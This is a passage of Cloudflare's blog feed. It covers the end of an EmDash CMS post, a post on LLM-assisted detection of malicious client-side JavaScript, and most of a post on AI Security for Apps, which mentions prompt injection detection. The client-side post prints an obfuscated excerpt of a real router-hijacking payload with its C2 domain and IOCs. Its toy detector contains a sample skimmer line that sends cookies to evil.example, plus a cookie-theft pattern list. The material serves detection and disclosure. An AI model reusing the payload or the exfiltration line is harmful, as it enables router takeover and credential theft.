You can <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#media-upload-file"><u>upload media</u></a>, <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#emdash-search"><u>search for content</u></a>, <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#schema-create-collection"><u>create and manage schemas</u></a>, and do the same set of things you can do in the Admin UI.</p></li><li><p><b>Built-in MCP Server:</b> Every EmDash instance provides its own remote Model Context Protocol (MCP) server, allowing you to do the same set of things you can do in the Admin UI.</p></li></ol>
    <div>
      <h3>Pluggable authentication, with Passkeys by default</h3>
      <a href="#pluggable-authentication-with-passkeys-by-default">
        
      </a>
    </div>
    <p>EmDash uses passkey-based authentication by default, meaning there are no passwords to leak and no brute-force vectors to defend against. User management includes familiar role-based access control out of the box: administrators, editors, authors, and contributors, each scoped strictly to the actions they need. Authentication is pluggable, so you can set EmDash up to work with your SSO provider, and automatically provision access based on IdP metadata.</p>
    <div>
      <h3>Import your WordPress sites to EmDash</h3>
      <a href="#import-your-wordpress-sites-to-emdash">
        
      </a>
    </div>
    <p>You can import an existing WordPress site either by exporting a WXR file from the WordPress admin, or by installing the <a href="https://github.com/emdash-cms/wp-emdash/tree/main/plugins/emdash-exporter"><u>EmDash Exporter plugin</u></a> on a WordPress site, which configures a secure endpoint that is only exposed to you, protected by a WordPress Application Password you control. Migrating content takes just a few minutes and automatically brings any attached media into EmDash’s media library.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/SUFaWUIoEFSN2z9rclKZW/28870489d502cff34e35ab3b59f19eae/image1.png" />
          </figure><p>Creating custom content types on WordPress beyond Posts and Pages has meant installing heavy plugins like Advanced Custom Fields, and squeezing the result into a crowded WordPress posts table. EmDash does things differently: you can define a schema directly in the admin panel, which creates entirely new EmDash collections for you, stored separately in the database. On import, you can use the same capabilities to take any custom post types from WordPress and create an EmDash content type from them.</p><p>For bespoke blocks, you can use the <a href="https://github.com/emdash-cms/emdash/blob/main/skills/creating-plugins/references/block-kit.md"><u>EmDash Block Kit Agent Skill</u></a> to instruct your agent of choice to build them for EmDash.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xutdF9nvHYMYlN6XfqRGu/1db0e0d73327e926d606f92fdd7aabec/image3.png" />
          </figure>
    <div>
      <h3>Try it</h3>
      <a href="#try-it">
        
      </a>
    </div>
    <p>EmDash is a v0.1.0 preview. We’d love for you to try it, give feedback, and contribute to the <a href="https://github.com/emdash-cms/emdash/"><u>EmDash GitHub repository</u></a>.</p><p>If you’re just playing around and want to first understand what’s possible — try out the admin interface in the <a href="https://emdashcms.com/"><u>EmDash Playground</u></a>.</p><p>To create a new EmDash site locally, via the CLI, run:</p><p><code>npm create emdash@latest</code></p><p>Or you can do the same via the Cloudflare dashboard below:</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/emdash-cms/templates/tree/main/blog-cloudflare"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>We’re excited to see what you build, and if you're active in the WordPress community, as a hosting platform, a plugin or theme author, or otherwise — we’d love to hear from you. Email us at emdash@cloudflare.com, and tell us what you’d like to see from the EmDash project.</p><p>If you want to stay up to date with major EmDash developments, you can leave your email address <a href="https://forms.gle/ofE1LYRYxkpAPqjE7"><u>here</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Open Source]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">64rkKr9jewVmxagIFgbwY4</guid>
            <dc:creator>Matt “TK” Taylor</dc:creator>
            <dc:creator>Matt Kane</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Client-Side Security: smarter detection, now open to everyone]]></title>
            <link>https://blog.cloudflare.com/client-side-security-open-to-everyone/</link>
            <pubDate>Mon, 30 Mar 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ We are opening our advanced Client-Side Security tools to all users, featuring a new cascading AI detection system. By combining graph neural networks and LLMs, we've reduced false positives by up to 200x while catching sophisticated zero-day exploits. ]]></description>
            <content:encoded><![CDATA[ <p>Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it needs is just one malicious script tag.</p><p>If that sounds abstract, here are two recent examples of such skimming attacks:</p><ul><li><p>In January 2026, <a href="https://sansec.io/research/keylogger-major-us-bank-employees"><u>Sansec reported</u></a> a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.</p></li><li><p>In September 2025, attackers published malicious releases of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>widely used npm packages</u></a>. If those packages were bundled into front-end code, end users could be exposed to crypto-stealing in the browser.</p></li></ul><p>To further our goal of building a better Internet, Cloudflare established a core tenet during our <a href="https://www.cloudflare.com/innovation-week/birthday-week-2025/"><u>Birthday Week 2025</u></a>: powerful security features should be accessible <a href="https://blog.cloudflare.com/enterprise-grade-features-for-all/"><u>without requiring a sales engagement</u></a>. In pursuit of this objective, we are announcing two key changes today:</p><p>First, Cloudflare <b>Client-Side Security Advanced</b> (formerly <b>Page Shield add-on</b>) is now <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>available to self-serve</u></a> customers. 
And second, domain-based threat intelligence is now complimentary for all customers on the <a href="https://developers.cloudflare.com/page-shield/#availability"><u>free </u><b><u>Client-Side Security</u></b><u> bundle</u></a>.</p><p>In this post, we’ll explain how this product works and highlight a new AI detection system designed to identify malicious JavaScript while minimizing false alarms. We’ll also discuss several real-world applications for these tools.</p>
    <div>
      <h2>How Cloudflare Client-Side Security works</h2>
      <a href="#how-cloudflare-client-side-security-works">
        
      </a>
    </div>
    <p>Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting an average of 2,200 scripts per enterprise zone.</p><p>Under the hood, Client-Side Security collects these signals using browser reporting (for example, <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP"><u>Content Security Policy</u></a>), which means you don’t need scanners or app instrumentation to get started, and there is zero latency impact to your web applications. The only prerequisite is that your traffic is proxied through Cloudflare.</p><p>Client-Side Security <b>Advanced</b> provides immediate access to powerful security features:</p><ul><li><p><b>Smarter malicious script detection:</b> Using in-house machine learning, this capability is now enhanced with assessments from a Large Language Model (LLM). Read more details below.</p></li><li><p><b>Code change monitoring:</b> Continuous code change detection and monitoring is included, which is essential for meeting compliance requirements like <a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"><u>PCI DSS v4</u></a> requirement 11.6.1.</p></li><li><p><b>Proactive blocking rules:</b> Benefit from positive content security rules that are maintained and enforced through continuous monitoring.</p></li></ul>
    <div>
      <h2>Detecting malicious intent in JavaScript</h2>
      <a href="#detecting-malicious-intent-javascripts">
        
      </a>
    </div>
    <p>Managing client-side security is a massive data problem. For an average enterprise zone, our systems observe approximately 2,200 unique scripts; smaller business zones frequently handle around 1,000. This volume alone is difficult to manage, but the real challenge is the volatility of the code.</p><p>Roughly a third of these scripts undergo code updates within any 30-day window. If a security team attempted to manually approve every new DOM (document object model) interaction or outbound connection, the resulting overhead would paralyze the development pipeline.</p><p>Instead, our detection strategy focuses on <i>what a script is trying to do</i>. That includes intent classification work <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>we’ve written about previously</u></a>. In short, we analyze the script's behavior using an Abstract Syntax Tree (AST). By breaking the code down into its logical structure, we can identify patterns that signal malicious intent, regardless of how the code is obfuscated.</p>
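<p>As a toy illustration of why behavior-based signals are useful (this is not Cloudflare’s pipeline, which operates on the full AST with a trained model), consider flagging a script only when a sensitive data source and an outbound exfiltration sink co-occur:</p>

```python
import re

# Toy illustration only: real intent classification parses the full AST.
# Here we just look for co-occurring "sensitive source" and "exfiltration
# sink" patterns, which survive simple renaming but not real obfuscation.
SOURCES = [r"document\.cookie", r"localStorage", r"\.value\b"]
SINKS = [r"fetch\(", r"XMLHttpRequest", r"new Image\(", r"\.src\s*="]

def intent_signals(js_source: str) -> dict:
    """Return which source/sink patterns appear in a script."""
    found_sources = [p for p in SOURCES if re.search(p, js_source)]
    found_sinks = [p for p in SINKS if re.search(p, js_source)]
    return {
        "sources": found_sources,
        "sinks": found_sinks,
        # Flag only when data access and an outbound channel co-occur.
        "suspicious": bool(found_sources and found_sinks),
    }

skimmer = "const c = document.cookie; new Image().src = '//evil.example/?d=' + c;"
print(intent_signals(skimmer)["suspicious"])  # True
```

<p>A pattern list like this breaks as soon as an attacker renames or packs the calls, which is exactly why the production system learns from the code’s structure rather than its surface strings.</p>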
    <div>
      <h2>The high cost of false positives</h2>
      <a href="#the-high-cost-of-false-positives">
        
      </a>
    </div>
    <p>Client-side security operates differently from a Web Application Firewall (WAF), which constantly observes matched attack signatures from vulnerability scanners and other automated attacks across the web. While a WAF blocks those high-volume attacks around the clock, a client-side compromise (such as a breach of an origin server or a third-party vendor) is a rare, high-impact event, especially in an enterprise environment with rigorous vendor reviews and code scanning.</p><p>This rarity creates a problem. Because real attacks are infrequent, a security system’s detections are statistically more likely to be false positives. For a security team, these false alarms create fatigue and hide real threats. To solve this, we integrated a Large Language Model (LLM) into our detection pipeline, drastically reducing the false positive rate.</p>
    <div>
      <h2>Adding an LLM-based second opinion for triage</h2>
      <a href="#adding-an-llm-based-second-opinion-for-triage">
        
      </a>
    </div>
    <p>Our <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>frontline detection engine</u></a> is a Graph Neural Network (GNN). GNNs are particularly well-suited for this task: they operate on the Abstract Syntax Tree (AST) of the JavaScript code, learning structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. In machine learning terms, the GNN learns an embedding of the code’s graph structure that generalizes across syntactic variations of the same semantic behavior.</p><p>The GNN is tuned for high recall. We want to catch novel, zero-day threats. Its precision is already remarkably high: less than 0.3% of total analyzed traffic is flagged as a false positive (FP). However, at Cloudflare’s scale of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>3.5 billion scripts assessed daily</u></a>, even a sub-0.3% FP rate translates to a volume of false alarms that can be disruptive to customers.</p><p>The core issue is a classic class imbalance problem. While we can collect extensive malicious samples, the sheer diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but perfectly legitimate scripts — like bot challenges, tracking pixels, ad-tech bundles, and minified framework builds — can exhibit structural patterns that overlap with malicious code in the GNN’s learned feature space. As much as we try to cover a huge variety of interesting benign cases, the model simply has not seen enough of this infinite variety during training.</p><p>This is precisely where Large Language Models (LLMs) complement the GNN. 
LLMs possess a deep semantic understanding of real-world JavaScript practices: they recognize domain-specific idioms, common framework patterns, and can distinguish sketchy-but-innocuous obfuscation from genuinely malicious intent.</p><p>Rather than replacing the GNN, we designed a cascading classifier architecture:</p><ol><li><p><b>Every script is first evaluated by the GNN</b>. If the GNN predicts the script as benign, the detection pipeline terminates immediately. <b>This incurs only the minimal latency of the GNN for the vast majority of traffic, completely bypassing the heavier computation time of the LLM</b>.</p></li><li><p>If the GNN flags the script as potentially malicious (above the decision threshold), the script is <b>forwarded to an open-source LLM</b> hosted on Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> for a second opinion.</p></li><li><p>The LLM, provided with a security-specialized prompt context, <b>semantically evaluates the script’s intent</b>. If it determines the script is benign, it overrides the GNN’s verdict.</p></li></ol><p>This two-stage design gives us the best of both worlds: the GNN’s high recall for structural malicious patterns, combined with the LLM’s broad semantic understanding to filter out false positives.</p>
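<p>The cascade can be sketched in a few lines (a minimal illustration with toy stand-ins for both models; <code>gnn_score</code>, <code>llm_is_benign</code>, and the threshold are all hypothetical):</p>

```python
GNN_THRESHOLD = 0.5  # hypothetical decision threshold

def gnn_score(script: str) -> float:
    """Stand-in for the GNN: returns a maliciousness score in [0, 1]."""
    return 0.9 if "eval(" in script else 0.1  # toy heuristic

def llm_is_benign(script: str) -> bool:
    """Stand-in for the Workers AI LLM second opinion."""
    return "minified-framework" in script  # toy heuristic

def classify(script: str) -> str:
    # Stage 1: every script goes through the cheap GNN first.
    if gnn_score(script) < GNN_THRESHOLD:
        return "benign"      # vast majority of traffic stops here
    # Stage 2: only GNN-flagged scripts pay the LLM's latency.
    if llm_is_benign(script):
        return "benign"      # LLM overrides the GNN's verdict
    return "malicious"       # both stages agree: flag it
```

<p>Because the expensive second stage only runs on the small fraction of traffic the first stage flags, lowering <code>GNN_THRESHOLD</code> trades a little extra LLM compute for higher recall.</p>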
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/438frLuYPU51j0uhtM5foj/10c53b3b3ccc84b00c754c872ad20492/image3.png" />
          </figure><p><a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/#training-the-model-to-detect-hidden-malicious-intent"><u>As we previously explained</u></a>, our GNN is trained on publicly accessible script URLs, the same scripts any browser would fetch. The LLM inference at runtime runs entirely within Cloudflare’s network via <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> using open-source models (we currently use <code>gpt-oss-120b</code>).</p><p>As an additional safety net, every script flagged by the GNN is logged to Cloudflare <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a> for post-hoc analysis. This allows us to continuously audit whether the LLM’s overrides are correct and catch any edge cases where a true attack might have been inadvertently filtered out. Yes, we dogfood our own storage products for our own ML pipeline.</p><p>The results from our internal evaluations on real production traffic are compelling. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation layer reduced false positives by nearly 3x: dropping the already low ~0.3% FP rate down to ~0.1%. When evaluating unique scripts, the impact is even more dramatic: the FP rate plummets a whopping ~200x, from ~1.39% down to just 0.007%.</p><p>At our scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms for our customers every single day. Crucially, our True Positive (actual attack) detection capability includes a fallback mechanism: as noted above, we audit the LLM’s overrides to check for possible true attacks that were filtered by the LLM.</p><p>Because the LLM acts as a highly reliable precision filter in this pipeline, we can now afford to lower the GNN’s decision threshold, making it even more aggressive. 
This means we catch novel, highly obfuscated True Attacks that would have previously fallen just below the detection boundary, all without overwhelming customers with false alarms. In the next phase, we plan to push this even further.</p>
    <div>
      <h3>Catching zero-days in the wild: The <code>core.js</code> router exploit</h3>
      <a href="#catching-zero-days-in-the-wild-the-core-js-router-exploit">
        
      </a>
    </div>
    <p>This two-stage architecture is already proving its worth in the wild. Just recently, our detection pipeline flagged a novel, highly obfuscated malicious script (<code>core.js</code>) targeting users in specific regions.</p><p>In this case, the payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon closer inspection via deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like <code>wanType=dhcp</code>, <code>wanType=static</code>, and <code>wanType=pppoe</code>), overwrites the DNS settings to hijack traffic through Chinese public DNS servers, and even attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it had been injected into users' sessions via compromised browser extensions.</p><p>To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator — a classic trick, but effective enough that traditional threat intelligence platforms like VirusTotal have not yet reported detections at the time of this writing.</p><p><b>Our GNN successfully revealed</b> the underlying malicious structure despite the obfuscation, and the <b>Workers AI LLM confidently confirmed</b> the intent. Here is a glimpse of the payload showing the target router API and the attempt to inject a rogue DNS server:</p>
            <pre><code>const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&amp;asyn=0&amp;auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&amp;newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&amp;dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&amp;autoset=1&amp;dns1=','fNKHB','nGkgt','aiEOB','d
pwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel'];
const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;};
(function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));</code></pre>
            <p>This is exactly the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but our structural and semantic AI approach catches.</p>
    <div>
      <h4>Indicators of Compromise (IOCs)</h4>
      <a href="#indicators-of-compromise-iocs">
        
      </a>
    </div>
    <ul><li><p><b>URL:</b> hxxps://ns[.]qpft5[.]com/ads/core[.]js</p></li><li><p><b>SHA-256:</b> 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202</p></li><li><p><b>C2 Domain:</b> hxxps://api[.]qpft5[.]com</p></li></ul>
    <div>
      <h2>Domain-based threat intelligence free for all</h2>
      <a href="#domain-based-threat-intelligence-free-for-all">
        
      </a>
    </div>
    <p>Today we are making domain-based threat intelligence available to all Cloudflare Client-Side Security customers, regardless of whether you use the Advanced offering.</p><p>In 2025, we saw many non-enterprise customers affected by client-side attacks, particularly those customers running webshops on the Magento platform. These attacks persisted for days or even weeks after they were publicized. Small and medium-sized companies often lack the enterprise-level resources and expertise needed to maintain a high security standard.</p><p>By providing domain-based threat intelligence to everyone, we give site owners a critical, direct signal of attacks affecting their users. This information allows them to take immediate action to clean up their site and investigate potential origin compromises.</p><p>To begin, simply enable Client-Side Security with a toggle <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>. We will then highlight any JavaScript or connections associated with a known malicious domain.</p>
    <div>
      <h2>Get started with Client-Side Security Advanced for PCI DSS v4</h2>
      <a href="#get-started-with-client-side-security-advanced-for-pci-dss-v4">
        
      </a>
    </div>
    <p>To learn more about Client-Side Security Advanced pricing, please visit <a href="https://www.cloudflare.com/plans/"><u>the plans page</u></a>. Before committing, we will estimate the cost based on your last month’s HTTP requests, so you know exactly what to expect.</p><p>Client-Side Security Advanced has all the tools you need to meet the requirements <a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"><u>of PCI DSS v4</u></a> as an e-commerce merchant, particularly 6.4.3 and 11.6.1. Sign up today <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6NYXSzUcRxDdj9UP0kouAK</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
        </item>
        <item>
            <title><![CDATA[AI Security for Apps is now generally available]]></title>
            <link>https://blog.cloudflare.com/ai-security-for-apps-ga/</link>
            <pubDate>Wed, 11 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare AI Security for Apps is now generally available, providing a security layer to discover and protect AI-powered applications, regardless of the model or hosting provider. We are also making AI discovery free for all plans, to help teams find and secure shadow AI deployments. ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare’s <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>AI Security for Apps</u></a> detects and mitigates threats to AI-powered applications. Today, we're announcing that it is generally available.</p><p>We’re shipping with new capabilities like detection for custom topics, and we're making AI endpoint discovery free for every Cloudflare customer—including those on Free, Pro, and Business plans—to give everyone visibility into where AI is deployed across their Internet-facing apps.</p><p>We're also announcing an expanded collaboration with IBM, which has chosen Cloudflare to deliver AI security to its cloud customers. And we’re partnering with Wiz to give mutual customers a unified view of their AI security posture.</p>
    <div>
      <h2>A new kind of attack surface</h2>
      <a href="#a-new-kind-of-attack-surface">
        
      </a>
    </div>
    <p>Traditional web applications have defined operations: check a bank balance, make a transfer. You can write deterministic rules to secure those interactions. </p><p>AI-powered applications and agents are different. They accept natural language and generate unpredictable responses. There's no fixed set of operations to allow or deny, because the inputs and outputs are probabilistic. Attackers can manipulate large language models to take unauthorized actions or leak sensitive data. Prompt injection, sensitive information disclosure, and unbounded consumption are just a few of the risks cataloged in the <a href="https://genai.owasp.org/llm-top-10/"><u>OWASP Top 10 for LLM Applications</u></a>.</p><p>These risks escalate as AI applications become agents. When an AI gains access to tool calls—processing refunds, modifying accounts, providing discounts, or accessing customer data—a single malicious prompt becomes an immediate security incident.</p><p>Customers tell us what they’re up against. "Most of Newfold Digital's teams are putting in their own Generative AI safeguards, but everybody is innovating so quickly that there are inevitably going to be some gaps eventually,” says Rick Radinger, Principal Systems Architect at Newfold Digital, which operates Bluehost, HostGator, and Domain.com. </p>
    <div>
      <h2>What AI Security for Apps does</h2>
      <a href="#what-ai-security-for-apps-does">
        
      </a>
    </div>
    <p>We built AI Security for Apps to address this. It sits in front of your AI-powered applications, whether you're using a third-party model or hosting your own, as part of Cloudflare's <a href="https://www.cloudflare.com/learning/cdn/glossary/reverse-proxy/"><u>reverse proxy</u></a>. It helps you (1) discover AI-powered apps across your web property, (2) detect malicious or off-policy requests to those endpoints, and (3) mitigate threats via the familiar WAF rule builder. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xpmckBUupzELjYOSx5bAF/cace1ab2ed2dd54d8d7a7ff60587ef65/BLOG-3128_2.png" />
          </figure>
    <div>
      <h3>Discovery — now free for everyone</h3>
      <a href="#discovery-now-free-for-everyone">
        
      </a>
    </div>
    <p>Before you can protect your LLM-powered applications, you need to know where they're being used. We often hear from security teams who don’t have a complete picture of AI deployments across their apps, especially as the LLM market evolves and developers swap out models and providers. </p><p>AI Security for Apps automatically identifies LLM-powered endpoints across your web properties, regardless of where they’re hosted or what the model is. Starting today, this capability is free for every Cloudflare customer, including Free, Pro, and Business plans. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2dBKhU5VNbzAePDAnaHkTK/3f6a569e495e03c3e2afca4d6183e02d/image4.png" />
          </figure><p><sup><i>Cloudflare’s dashboard page of web assets, showing 2 example endpoints labelled as </i></sup><code><sup><i>cf-llm</i></sup></code></p><p>Discovering these endpoints automatically requires more than matching common path patterns like <code>/chat/completions</code>. Many AI-powered applications don't have a chat interface: think product search, property valuation tools, or recommendation engines. We built a <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#discovering-llm-powered-applications"><u>detection system that looks at how endpoints behave</u></a>, not what they're called. To confidently identify AI-powered endpoints, <a href="https://developers.cloudflare.com/api-shield/security/api-discovery/#requirements"><u>sufficient valid traffic</u></a> is required.</p><p>AI-powered endpoints that have been discovered will be visible under <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets"><u>Security → Web Assets</u></a>, labeled as <code>cf-llm</code>. For customers on a Free plan, endpoint discovery is initiated when you first navigate to the <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets/discovery"><u>Discovery page</u></a>. For customers on a paid plan, discovery occurs automatically in the background on a recurring basis. If your AI-powered endpoints have been discovered, you can review them immediately.</p>
    <div>
      <h3>Detection</h3>
      <a href="#detection">
        
      </a>
    </div>
    <p>AI Security for Apps detections follow the <a href="https://developers.cloudflare.com/waf/detections/"><u>always-on approach</u></a> for traffic to your AI-powered endpoints. Each prompt is run through multiple detection modules for prompt injection, PII exposure, and sensitive or toxic topics. The results—whether the prompt was malicious or not—are attached as metadata you can use in custom WAF rules to enforce your policies. We are continuously exploring ways to leverage our global network, which sees traffic from roughly <a href="https://w3techs.com/technologies/history_overview/proxy/all"><u>20% of the web</u></a>, to identify new attack patterns across millions of sites before they reach yours.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oGjcaUL5L9zlAkz8lSmXv/4354a9555135e19de5c93d3d113e6790/BLOG-3128_4.png" />
          </figure>
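For instance, a custom WAF rule can match on the attached detection metadata together with ordinary request fields. This is only a sketch: the `cf.llm.prompt.pii_detected` field below follows Cloudflare's Firewall for AI naming, but verify the exact field names in the WAF fields reference before relying on them.

```
cf.llm.prompt.pii_detected and http.request.uri.path contains "/api/chat"
```

Paired with a Block or Log action, an expression like this would act on prompts flagged for PII only on the chat endpoint.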
    <div>
      <h4>New in GA: Custom topics detection</h4>
      <a href="#new-in-ga-custom-topics-detection">
        
      </a>
    </div>
    <p>The product ships with built-in detection for common threats: prompt injections, <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#detecting-prompts-designed-to-leak-pii"><u>PII extraction</u></a>, and <a href="https://blog.cloudflare.com/block-unsafe-llm-prompts-with-firewall-for-ai/"><u>toxic topics</u></a>. But every business has its own definition of what's off-limits. A financial services company might need to detect discussions of specific securities. A healthcare company might need to flag conversations that touch on patient data. A retailer might want to know when customers are asking about competitor products.</p><p>The new custom topics feature lets you define these categories. You specify the topic, we inspect the prompt and output a relevance score that you can use to log, block, or handle however you decide. Our goal is to build an extensible tool that flexes to your use cases.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1WzPhy11ZmUXDGZjft4sY1/7ebfafaf2114eaba83a829694837fc2c/image1.png" />
          </figure><p><sup><i>Prompt relevance score inside of AI Security for Apps</i></sup></p>
    <div>
      <h4>New in GA: Custom prompt extraction</h4>
      <a href="#new-in-ga-custom-prompt-extraction">
        
      </a>
    </div>
    <p>AI Security for Apps enforces guardrails before unsafe prompts can reach your infrastructure. To run detections accurately and provide real-time protection, we first need to identify the prompt within the request payload. Prompts can live anywhere in a request body, and different LLM providers structure their APIs differently. OpenAI and most providers use <code>$.messages[*].content</code> for chat completions. Anthropic's batch API nests prompts inside <code>$.requests[*].params.messages[*].content</code>. Your custom property valuation tool might use <code>$.property_description</code>.</p><p>Out of the box, we support the standard formats used by OpenAI, Anthropic, Google Gemini, Mistral, Cohere, xAI, DeepSeek, and others. When we can't match a known pattern, we apply a default-secure posture and run detection on the entire request body. This can introduce false positives when the payload contains fields that are sensitive but don't feed directly to an AI model, for example, a <code>$.customer_name</code> field alongside the actual prompt might trigger PII detection unnecessarily.</p><p>Soon, you'll be able to define your own JSONPath expressions to tell us exactly where to find the prompt. This will reduce false positives and lead to more accurate detections. We're also building a prompt-learning capability that will automatically adapt to your application's structure over time.</p>
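To illustrate how a JSONPath expression pins down the prompt, here is a minimal sketch of the idea (not Cloudflare's implementation; a production system would use a full JSONPath library). The helper supports only the `$.key[*].key` shapes mentioned above:

```python
from typing import Any, List

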